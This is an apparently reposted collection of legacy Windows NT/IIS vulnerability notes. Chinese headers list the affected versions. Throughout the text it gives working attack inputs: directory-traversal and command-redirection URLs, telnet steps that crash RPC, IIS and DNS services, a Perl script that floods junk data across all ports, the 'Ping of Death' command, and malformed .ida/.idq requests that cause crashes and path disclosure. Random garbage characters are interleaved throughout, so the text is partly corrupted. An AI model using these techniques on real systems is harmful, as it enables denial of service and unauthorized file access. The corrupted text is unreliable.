NT的漏洞及描述(英文）

受影响系统:4.0,iis 1.0
" W+ z1 H, c7 \* \- {A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

% i3 X- p0 @7 y, d6 aA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------

7 g# D0 U/ T4 e0 M受影响系统:4.0
& \9 k( M* N9 P! s0 ~4 Q& ZA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
* b0 e, f" X  O/ Q* y; d! y
If the file 'target.bat' exists, the file will be truncated.

3 u4 \. j. U# x' w0 u& }
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.

----------------------------------------------------------------------

受影响系统:3.51,4.0
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
2 ^- R7 A9 e4 b) c
, ?' E+ F$ x) T9 G6 w8 j, AThe following steps;
4 Y1 C2 J, a* C1 c' B! G' w
' h: V, T. Q: @  e, _0 }Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
9 N5 v5 |1 |$ g) V6 [
7 N; T) H9 m! L# h$ u8 @# ~When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
# d% l8 v% n& _2 v& W, t: J
9 u) R+ \* R; c# d: zThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
( k  D/ u$ w1 ~7 T! d! U3 k* h
5 Q" r' D7 B; w2 c6 @If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
* u$ e. l- I" V0 f
# i; f8 E9 v- R7 EThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
% V6 e( M9 {  R3 N
+ w  \9 P& v: X2 ]$ K2 N/*begin poke code*/

0 L6 a8 x# l! I2 \7 V0 Huse Socket;
use FileHandle;
+ k6 m5 u: W% p# R8 _require "chat2.pl";
# e+ x9 o+ E- m, X8 P
$systemname = $ARGV[0] && shift;

/ W. `. P' E0 P0 @8 s$verbose = 1; # tell me what you're hitting
7 v2 I: |1 v& I" T$knownports = 1; # don't hit known problem ports
for ($port = $0; $port<65535; $port++)
{


* X0 ^) k; k" Lif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
next;
}
: b4 Q4 s; q: x) S8 C$fh = chat::open_port($systemname, $port);
# U: Q! h' o, l( @4 Fchat::print ($fh,"This is about ten characters or more");
! T' D* i+ A# q% N! U* E4 rif ($verbose) {
; z) F* N' j* |9 E- ^print "Trying port: $port\n";
}
* ]8 f; ~! |/ Y+ N: W/ Ychat::close($fh);

; m3 P; A/ n6 x9 m2 u}


/*end poke code*/

1 }7 T( }" f% f# v: Q9 o, B% xSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
. j" O. c7 r2 D
3 X2 r3 h4 |. Z2 h( B5 g; m4 J--------------------------------------------------------------------------------
  s7 D% d6 C" h7 y$ H. m
% n* d+ K' c1 j9 y1 T6 Z受影响系统:4.0
1 K8 a$ ]+ }5 Q$ _: Z' iUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
. ?+ O& u" |9 V8 {" J
6 H! n0 g) e: [; M2 n2 l8 @# o: lThis attack causes Dr. Watson to display an alert window and to log an error:

: [' a2 C. w4 }# g( }. R6 @& Q$ v"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

+ Z5 @1 o. p7 m3 `1 V--------------------------------------------------------------------------------
4 G; D5 b8 k) W6 \! x* y( G) K! q
受影响系统:3.51,4.0
$ e8 h# S6 m' T( g- W! ZLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
, x. p! U9 Q& J% ^, N" e  {6 Z: U0 O
" [9 l3 Z+ h# M8 y4 [+ ZSTOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
( s) m/ }: a; O# P
* m, E+ |2 _" w5 }+ w-OR-

STOP: 0x0000000A
# g8 V3 _9 ~% {0 ^: T# P9 sIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

: _3 H5 `" ?& V8 b2 e3 s! O) \+ }NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
% ~& V7 `' f9 R' s6 I! ?, v
--------------------------------------------------------------------------------
! Q+ B1 r, @3 g+ ]- A8 d- X
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

; c3 j# Y( a- d: T, ?% T--------------------------------------------------------
5 Q7 Z0 [2 m& s/ M0 X3 `4 A
2 W) E4 \, S; P) @1 xIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server